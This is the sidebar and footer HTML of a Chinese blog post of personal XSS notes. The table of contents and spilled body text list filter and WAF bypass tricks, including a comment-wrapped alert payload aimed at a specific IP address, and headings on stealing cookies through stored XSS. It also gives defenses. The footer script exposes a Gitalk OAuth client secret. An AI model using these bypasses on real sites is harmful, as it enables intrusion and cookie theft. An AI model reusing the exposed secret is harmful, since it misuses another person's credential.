          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#1-Xss%E7%AE%80%E4%BB%8B"><span class="nav-text">1.Xss简介</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-%E4%BB%80%E4%B9%88%E6%98%AFxss"><span class="nav-text">(1)什么是xss</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-%E4%BB%80%E4%B9%88%E6%98%AFcookie"><span class="nav-text">(2)什么是cookie</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-Xss%E7%9A%84%E7%A7%8D%E7%B1%BB"><span class="nav-text">(3)Xss的种类</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%8D%E5%B0%84%E5%9E%8BXSS"><span class="nav-text">反射型XSS</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AD%98%E5%82%A8%E5%9E%8BXSS"><span class="nav-text">存储型XSS</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#DOM%E5%9E%8BXSS"><span class="nav-text">DOM型XSS</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#2-%E4%B8%89%E7%A7%8D%E8%A7%A6%E5%8F%91js%E7%9A%84%E6%83%85%E5%86%B5"><span class="nav-text">2.三种触发js的情况</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%A0%87%E7%AD%BE%E9%A3%8E%E6%A0%BC%EF%BC%9A"><span class="nav-text">标签风格：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BC%AA%E5%8D%8F%E8%AE%AE%EF%BC%9A"><span class="nav-text">伪协议：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BA%8B%E4%BB%B6%E5%9E%8B%EF%BC%9A"><span class="nav-text">事件型：</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#3-%E6%B5%8B%E8%AF%95XSS%E7%9A%84%E6%AD%A5%E9%AA%A4"><span class="nav-text">3.测试XSS的步骤</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-%E8%A7%81%E6%A1%86%E5%B0%B1%E6%8F%92"><span class="nav-text">(1)见框就插</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-%E6%9F%A5%E7%9C%8B%E6%BA%90%E7%A0%81"><span class="nav-text">(2)查看源码</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-%E6%89%BE%E5%85%B6%E4%BB%96%E8%BE%93%E5%87%BA%E7%82%B9"><span class="nav-text">(3)找其他输出点</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#4-%E5%AD%98%E5%82%A8%E5%9E%8Bxss%E7%AA%83%E5%8F%96cookie"><span class="nav-text">4.存储型xss窃取cookie</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-%E6%9A%82%E6%97%B6%E5%AD%98%E6%B4%BB%E7%9A%84XSS%E5%B9%B3%E5%8F%B0"><span class="nav-text">(1)暂时存活的XSS平台:</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link"><span class="nav-text">标签的内容会变成标题。
alert(123)

document.getElementById().innerHTML&#x3D;’’innerHTML 属性设置或返回表格行的开始和结束标签之间的 HTML,比如&lt;div id&#x3D;&#39;abcd&#39;&gt;NF&lt;&#x2F;div&gt;可以通过getElementById&#x3D;’abcd’找到这个div标签,而NF就是这个标签中的innerHTML.
如何绕过xss过滤针对事件型漏洞，一般网站可能会对双引号进行实体化编码，这个时候如果没有dom型，或者单引号不能使用的情况下，还是真的不好绕过
针对于黑名单过滤，总是过滤不全的，比如过滤了img，还有input，还有div等等过滤了onclik、onmouseover，可以尝试比较冷梦的事件触发onmouseenter过滤了小括号，可以尝试单引号，过滤了单引号可以尝试反引号过滤了alert，可以尝试confirm和prompt还有就是大小写、双写绕过之类的
Native编码是document.write()可识别的编码,可以用来绕过wafindex.php&#x2F;1.txt也可绕waf因为web容器认为txt是安全的,传参没有问题,但是找不到1.txt就往前找到php了
注释法也可以绕?id&#x3D;&#x2F;*&lt;script&gt;alert(1)&lt;&#x2F;script&gt;*&#x2F;   &#x2F;*&#x2F;之间的为注释,我的理解为因为是注释,所以狗让过了,但是在浏览器端,发现了右闭合标签可以和左边script标签闭合,所以进行了闭合,但是此时没有进行弹窗,要进行弹窗,得再给一个右闭合标签,才能让弹窗标签逃逸出来&#96;http:&#x2F;&#x2F;59.63.166.75:8154&#x2F;?a&#x3D;&#x2F;&lt;&#x2F;script&gt;alert(1)*&#x2F;&#96;
 XSS防御方法：​    1、过滤​    2、编码（HTML实体编码 替代可能产生危险的字符&lt;&gt;&amp;”）​        标签风格XSS  [事件型|伪协议]​    3、http-only (Cookie的一种属于，如果这个Cookie有http-only,那么JS是无法读取)​        设置其实是在获取Cookie的设置（开发）​        能绕过：​            1、IE浏览器​            2、想办法让页面输出Cookie(探针，phpinfo())
</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#document-getElementById-innerHTML-%E2%80%99%E2%80%99"><span class="nav-text">document.getElementById().innerHTML&#x3D;’’</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%A6%82%E4%BD%95%E7%BB%95%E8%BF%87xss%E8%BF%87%E6%BB%A4"><span class="nav-text">如何绕过xss过滤</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Native%E7%BC%96%E7%A0%81%E6%98%AFdocument-write-%E5%8F%AF%E8%AF%86%E5%88%AB%E7%9A%84%E7%BC%96%E7%A0%81-%E5%8F%AF%E4%BB%A5%E7%94%A8%E6%9D%A5%E7%BB%95%E8%BF%87waf"><span class="nav-text">Native编码是document.write()可识别的编码,可以用来绕过waf</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#index-php-1-txt%E4%B9%9F%E5%8F%AF%E7%BB%95waf"><span class="nav-text">index.php&#x2F;1.txt也可绕waf</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B3%A8%E9%87%8A%E6%B3%95%E4%B9%9F%E5%8F%AF%E4%BB%A5%E7%BB%95"><span class="nav-text">注释法也可以绕</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link"><span class="nav-text"> </span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#XSS%E9%98%B2%E5%BE%A1%E6%96%B9%E6%B3%95%EF%BC%9A"><span class="nav-text">XSS防御方法：</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="dtxHarry"
      src="/images/avatar.jpeg">
  <p class="site-author-name" itemprop="name">dtxHarry</p>
  <div class="site-description" itemprop="description">随便写点自己的笔记</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">38</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">32</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/dtxharry" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;dtxharry" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i></a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:dtxharry@gmail.com" title="E-Mail → mailto:dtxharry@gmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i></a>
      </span>
      <span class="links-of-author-item">
        <a href="https://instagram.com/dtxharry" title="Instagram → https:&#x2F;&#x2F;instagram.com&#x2F;dtxharry" rel="noopener" target="_blank"><i class="fab fa-instagram fa-fw"></i></a>
      </span>
  </div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">dtxHarry</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/pjax/pjax.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>

<script src="/js/bookmark.js"></script>

  <script>
var pjax = new Pjax({
  selectors: [
    'head title',
    '#page-configurations',
    '.content-wrap',
    '.post-toc-wrap',
    '.languages',
    '#pjax'
  ],
  switches: {
    '.post-toc-wrap': Pjax.switches.innerHTML
  },
  analytics: false,
  cacheBust: false,
  scrollTo : !CONFIG.bookmark.enable
});

window.addEventListener('pjax:success', () => {
  document.querySelectorAll('script[data-pjax], script#page-configurations, #pjax script').forEach(element => {
    var code = element.text || element.textContent || element.innerHTML || '';
    var parent = element.parentNode;
    parent.removeChild(element);
    var script = document.createElement('script');
    if (element.id) {
      script.id = element.id;
    }
    if (element.className) {
      script.className = element.className;
    }
    if (element.type) {
      script.type = element.type;
    }
    if (element.src) {
      script.src = element.src;
      // Force synchronous loading of peripheral JS.
      script.async = false;
    }
    if (element.dataset.pjax !== undefined) {
      script.dataset.pjax = '';
    }
    if (code !== '') {
      script.appendChild(document.createTextNode(code));
    }
    parent.appendChild(script);
  });
  NexT.boot.refresh();
  // Define Motion Sequence & Bootstrap Motion.
  if (CONFIG.motion.enable) {
    NexT.motion.integrator
      .init()
      .add(NexT.motion.middleWares.subMenu)
      .add(NexT.motion.middleWares.postList)
      .bootstrap();
  }
  NexT.utils.updateSidebarPosition();
});
</script>




  




  
<script src="/js/local-search.js"></script>













    <div id="pjax">
  

  

  

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.css">

<script>
NexT.utils.loadComments(document.querySelector('#gitalk-container'), () => {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js', () => {
    var gitalk = new Gitalk({
      clientID    : '9570c461857920411424',
      clientSecret: '821d08c71a9e130930a3b36dc0a8fc0ee0fedf68',
      repo        : 'dtxharry.github.io',
      owner       : 'dtxharry',
      admin       : ['dtxharry'],
      id          : '277cfbadaf300a081e3aadc6ea1d8702',
        language: 'zh-CN',
      distractionFreeMode: true
    });
    gitalk.render('gitalk-container');
  }, window.Gitalk);
});
</script>

    </div>

</body>
</html>
